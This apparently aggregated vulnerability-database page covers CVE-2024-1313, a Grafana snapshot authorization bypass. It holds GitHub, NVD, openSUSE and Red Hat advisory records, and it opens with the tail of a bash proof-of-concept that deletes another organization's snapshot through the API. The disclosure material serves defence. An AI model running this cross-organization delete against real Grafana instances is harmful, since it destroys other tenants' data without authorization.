\"http://localhost:3000/api/snapshots\" -H \"Authorization: Basic ${user_a_token}\" -H \"Content-Type: application/json\" -d \"${snapshot_data}\")\n\n# Extract key from create snapshot response\nkey=$(echo \"$create_snapshot_response\" | jq -r \u0027.key\u0027)\n\n# Delete snapshot\ndelete_snapshot_response=$(curl -s -X DELETE \"http://localhost:3000/api/snapshots/${key}\" -H \"Authorization: Basic ${user_b_token}\" -o /dev/null -w \"%{http_code}\")\n\n# Check if the test passed\nif [ \"$delete_snapshot_response\" -eq 200 ]; then\n echo -e \"\\033[32mTest was passed, BOLA\\033[0m\"\nfi\n\n```\n\n",
"id": "GHSA-67rv-qpw2-6qrr",
"modified": "2024-11-18T16:26:39Z",
"published": "2024-04-05T19:29:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-67rv-qpw2-6qrr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1313"
},
{
"type": "PACKAGE",
"url": "https://github.com/grafana/grafana"
},
{
"type": "WEB",
"url": "https://grafana.com/security/security-advisories/cve-2024-1313"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Grafana: Users outside an organization can delete a snapshot with its key"
}
GHSA-MH7P-8M2F-QRM6
Vulnerability from github – Published: 2024-03-26 18:32 – Updated: 2024-06-10 18:30
VLAI?
Summary
Duplicate Advisory: Grafana vulnerable to authorization bypass
Details
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-67rv-qpw2-6qrr. This link is maintained to preserve external references.
Original Description
It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/<key> using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.
Grafana Labs would like to thank Ravid Mazon and Jay Chen of Palo Alto Research for discovering and disclosing this vulnerability.
This issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.
Severity ?
6.5 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "9.5.0"
},
{
"fixed": "9.5.18"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.0.0"
},
{
"fixed": "10.0.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.1.0"
},
{
"fixed": "10.1.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.2.0"
},
{
"fixed": "10.2.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.3.0"
},
{
"fixed": "10.3.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2024-03-27T02:01:45Z",
"nvd_published_at": "2024-03-26T18:15:09Z",
"severity": "MODERATE"
},
"details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-67rv-qpw2-6qrr. This link is maintained to preserve external references.\n\n## Original Description\nIt is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a `DELETE` request to `/api/snapshots/\u003ckey\u003e` using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\n\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo Alto Research for discovering and disclosing this vulnerability.\n\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.\n\n",
"id": "GHSA-mh7p-8m2f-qrm6",
"modified": "2024-06-10T18:30:53Z",
"published": "2024-03-26T18:32:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1313"
},
{
"type": "PACKAGE",
"url": "https://github.com/grafana/grafana"
},
{
"type": "WEB",
"url": "https://grafana.com/security/security-advisories/cve-2024-1313"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20240524-0008"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Duplicate Advisory: Grafana vulnerable to authorization bypass",
"withdrawn": "2024-04-05T19:30:35Z"
}
GSD-2024-1313
Vulnerability from gsd - Updated: 2024-02-08 06:02Details
It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/<key> using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.
Grafana Labs would like to thank Ravid Mazon and Jay Chen of Palo
Alto Research for discovering and disclosing this vulnerability.
This issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.
Aliases
{
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2024-1313"
],
"details": "It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/\u003ckey\u003e using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\n\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo \nAlto Research for discovering and disclosing this vulnerability.\n\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.\n\n",
"id": "GSD-2024-1313",
"modified": "2024-02-08T06:02:25.243191Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security@grafana.com",
"ID": "CVE-2024-1313",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Grafana",
"version": {
"version_data": [
{
"version_value": "not down converted",
"x_cve_json_5_version_data": {
"defaultStatus": "unaffected",
"versions": [
{
"lessThan": "9.5.18",
"status": "affected",
"version": "9.5.0",
"versionType": "semver"
},
{
"lessThan": "10.0.13",
"status": "affected",
"version": "10.0.0",
"versionType": "semver"
},
{
"lessThan": "10.1.9",
"status": "affected",
"version": "10.1.0",
"versionType": "semver"
},
{
"lessThan": "10.2.6",
"status": "affected",
"version": "10.2.0",
"versionType": "semver"
},
{
"lessThan": "10.3.5",
"status": "affected",
"version": "10.3.0",
"versionType": "semver"
},
{
"status": "unaffected",
"version": "10.4.0"
}
]
}
}
]
}
}
]
},
"vendor_name": "Grafana"
}
]
}
},
"configuration": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "To be exposed to this issue, a grafana instance must be configured with multiple organizations and have the snapshots feature turned on.\u003cbr\u003e"
}
],
"value": "To be exposed to this issue, a grafana instance must be configured with multiple organizations and have the snapshots feature turned on.\n"
}
],
"credits": [
{
"lang": "en",
"value": "Ravid Mazon"
},
{
"lang": "en",
"value": "Jay Chen"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/\u003ckey\u003e using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\n\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo \nAlto Research for discovering and disclosing this vulnerability.\n\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.\n\n"
}
]
},
"generator": {
"engine": "Vulnogram 0.1.0-dev"
},
"impact": {
"cvss": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-639",
"lang": "eng",
"value": "CWE-639 Authorization Bypass Through User-Controlled Key"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://grafana.com/security/security-advisories/cve-2024-1313/",
"refsource": "MISC",
"url": "https://grafana.com/security/security-advisories/cve-2024-1313/"
}
]
},
"source": {
"discovery": "EXTERNAL"
}
},
"nvd.nist.gov": {
"cve": {
"descriptions": [
{
"lang": "en",
"value": "It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/\u003ckey\u003e using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\n\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo \nAlto Research for discovering and disclosing this vulnerability.\n\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.\n\n"
},
{
"lang": "es",
"value": "Es posible que un usuario de una organizaci\u00f3n diferente al propietario de una instant\u00e1nea omita la autorizaci\u00f3n y elimine una instant\u00e1nea emitiendo una solicitud DELETE a /api/snapshots/ usando su clave de vista. Esta funcionalidad est\u00e1 destinada a estar disponible solo para personas con permiso para escribir/editar la instant\u00e1nea en cuesti\u00f3n, pero debido a un error en la l\u00f3gica de autorizaci\u00f3n, las solicitudes de eliminaci\u00f3n emitidas por un usuario sin privilegios en una organizaci\u00f3n diferente a la del propietario de la instant\u00e1nea se tratan. seg\u00fan lo autorizado. Grafana Labs desea agradecer a Ravid Mazon y Jay Chen de Palo Alto Research por descubrir y revelar esta vulnerabilidad. Este problema afecta a Grafana: desde 9.5.0 antes de 9.5.18, desde 10.0.0 antes de 10.0.13, desde 10.1.0 antes de 10.1.9, desde 10.2.0 antes de 10.2.6, desde 10.3.0 antes de 10.3.5."
}
],
"id": "CVE-2024-1313",
"lastModified": "2024-03-27T12:29:41.530",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "security@grafana.com",
"type": "Secondary"
}
]
},
"published": "2024-03-26T18:15:09.350",
"references": [
{
"source": "security@grafana.com",
"url": "https://grafana.com/security/security-advisories/cve-2024-1313/"
}
],
"sourceIdentifier": "security@grafana.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-639"
}
],
"source": "security@grafana.com",
"type": "Secondary"
}
]
}
}
}
}
OPENSUSE-SU-2024:13831-1
Vulnerability from csaf_opensuse - Published: 2024-06-15 00:00 - Updated: 2024-06-15 00:00Summary
grafana-10.3.5-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: grafana-10.3.5-1.1 on GA media
Description of the patch: These are all security issues fixed in the grafana-10.3.5-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2024-13831
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
6.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:grafana-10.3.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:grafana-10.3.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:grafana-10.3.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:grafana-10.3.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
References
5 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "grafana-10.3.5-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the grafana-10.3.5-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2024-13831",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13831-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-1313 page",
"url": "https://www.suse.com/security/cve/CVE-2024-1313/"
}
],
"title": "grafana-10.3.5-1.1 on GA media",
"tracking": {
"current_release_date": "2024-06-15T00:00:00Z",
"generator": {
"date": "2024-06-15T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:13831-1",
"initial_release_date": "2024-06-15T00:00:00Z",
"revision_history": [
{
"date": "2024-06-15T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "grafana-10.3.5-1.1.aarch64",
"product": {
"name": "grafana-10.3.5-1.1.aarch64",
"product_id": "grafana-10.3.5-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-10.3.5-1.1.ppc64le",
"product": {
"name": "grafana-10.3.5-1.1.ppc64le",
"product_id": "grafana-10.3.5-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-10.3.5-1.1.s390x",
"product": {
"name": "grafana-10.3.5-1.1.s390x",
"product_id": "grafana-10.3.5-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-10.3.5-1.1.x86_64",
"product": {
"name": "grafana-10.3.5-1.1.x86_64",
"product_id": "grafana-10.3.5-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-10.3.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:grafana-10.3.5-1.1.aarch64"
},
"product_reference": "grafana-10.3.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-10.3.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:grafana-10.3.5-1.1.ppc64le"
},
"product_reference": "grafana-10.3.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-10.3.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:grafana-10.3.5-1.1.s390x"
},
"product_reference": "grafana-10.3.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-10.3.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:grafana-10.3.5-1.1.x86_64"
},
"product_reference": "grafana-10.3.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-1313",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-1313"
}
],
"notes": [
{
"category": "general",
"text": "It is possible for a user in a different organization from the owner of a snapshot to bypass authorization and delete a snapshot by issuing a DELETE request to /api/snapshots/\u003ckey\u003e using its view key. This functionality is intended to only be available to individuals with the permission to write/edit to the snapshot in question, but due to a bug in the authorization logic, deletion requests issued by an unprivileged user in a different organization than the snapshot owner are treated as authorized.\n\nGrafana Labs would like to thank Ravid Mazon and Jay Chen of Palo \nAlto Research for discovering and disclosing this vulnerability.\n\nThis issue affects Grafana: from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, from 10.3.0 before 10.3.5.\n\n",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:grafana-10.3.5-1.1.aarch64",
"openSUSE Tumbleweed:grafana-10.3.5-1.1.ppc64le",
"openSUSE Tumbleweed:grafana-10.3.5-1.1.s390x",
"openSUSE Tumbleweed:grafana-10.3.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-1313",
"url": "https://www.suse.com/security/cve/CVE-2024-1313"
},
{
"category": "external",
"summary": "SUSE Bug 1222155 for CVE-2024-1313",
"url": "https://bugzilla.suse.com/1222155"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:grafana-10.3.5-1.1.aarch64",
"openSUSE Tumbleweed:grafana-10.3.5-1.1.ppc64le",
"openSUSE Tumbleweed:grafana-10.3.5-1.1.s390x",
"openSUSE Tumbleweed:grafana-10.3.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:grafana-10.3.5-1.1.aarch64",
"openSUSE Tumbleweed:grafana-10.3.5-1.1.ppc64le",
"openSUSE Tumbleweed:grafana-10.3.5-1.1.s390x",
"openSUSE Tumbleweed:grafana-10.3.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-06-15T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-1313"
}
]
}
RHSA-2024:2568
Vulnerability from csaf_redhat - Published: 2024-04-30 13:33 - Updated: 2026-04-23 01:37Summary
Red Hat Security Advisory: grafana security update
Severity
Moderate
Notes
Topic: An update for grafana is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives
a detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details: Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB.
Security Fix(es):
* grafana: golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)
* grafana: vulnerable to authorization bypass (CVE-2024-1313)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A vulnerability was found in Grafana. Due to an error in authorization logic, it is possible for an unprivileged user in a different organization other than the snapshot owner to perform unauthorized actions such as deleting it using a view key.
6.5 (Medium)
Affected products
Fixed
17 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Moderate
A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.
7.5 (High)
Affected products
Fixed
17 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
References
21 references
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2024:2568 | self |
| https://access.redhat.com/security/updates/classi… | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2262921 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2271903 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2024-1313 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2271903 | external |
| https://www.cve.org/CVERecord?id=CVE-2024-1313 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2024-1313 | external |
| https://github.com/advisories/GHSA-67rv-qpw2-6qrr | external |
| https://github.com/advisories/GHSA-mh7p-8m2f-qrm6 | external |
| https://grafana.com/security/security-advisories/… | external |
| https://access.redhat.com/security/cve/CVE-2024-1394 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2262921 | external |
| https://www.cve.org/CVERecord?id=CVE-2024-1394 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2024-1394 | external |
| https://github.com/golang-fips/openssl/commit/85d… | external |
| https://github.com/golang-fips/openssl/security/a… | external |
| https://github.com/microsoft/go-crypto-openssl/co… | external |
| https://pkg.go.dev/vuln/GO-2024-2660 | external |
| https://vuln.go.dev/ID/GO-2024-2660.json | external |
Acknowledgments
@r3kumar
@qmuntal
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
